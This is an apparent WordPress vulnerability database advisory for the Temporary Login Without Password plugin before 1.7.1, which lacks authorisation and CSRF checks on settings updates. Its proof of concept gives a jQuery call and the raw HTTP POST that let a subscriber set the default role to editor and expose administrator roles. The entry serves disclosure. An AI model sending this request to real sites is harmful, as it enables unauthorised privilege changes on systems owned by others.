WordPress Plugin Vulnerabilities
Temporary Login Without Password < 1.7.1 - Subscriber+ Plugin's Settings Update
Description
The plugin does not have authorisation and CSRF checks when updating its settings, which could allows any logged-in users, such as subscribers to update them
Proof of Concept
jQuery.post("https://example.com/wp-admin/index.php", { "wtlwp-nonce": "foo", // Not validated tlwp_settings_data: { default_role: "editor", default_expiry_time: "month_after_access", visible_roles: ["editor", "administrator"], default_redirect_to: "wp_dashboard" } }) POST /wp-admin/index.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 288 Connection: close Cookie: [subscriber+] wtlwp-nonce=foo&tlwp_settings_data%5Bdefault_role%5D=editor&tlwp_settings_data%5Bdefault_expiry_time%5D=month_after_access&tlwp_settings_data%5Bvisible_roles%5D%5B%5D=editor&tlwp_settings_data%5Bvisible_roles%5D%5B%5D=administrator&tlwp_settings_data%5Bdefault_redirect_to%5D=wp_dashboard
Affects Plugins
References
CVE
Classification
Type
INCORRECT AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-11-15 (about 2 years ago)
Added
2021-11-15 (about 2 years ago)
Last Updated
2022-04-09 (about 2 years ago)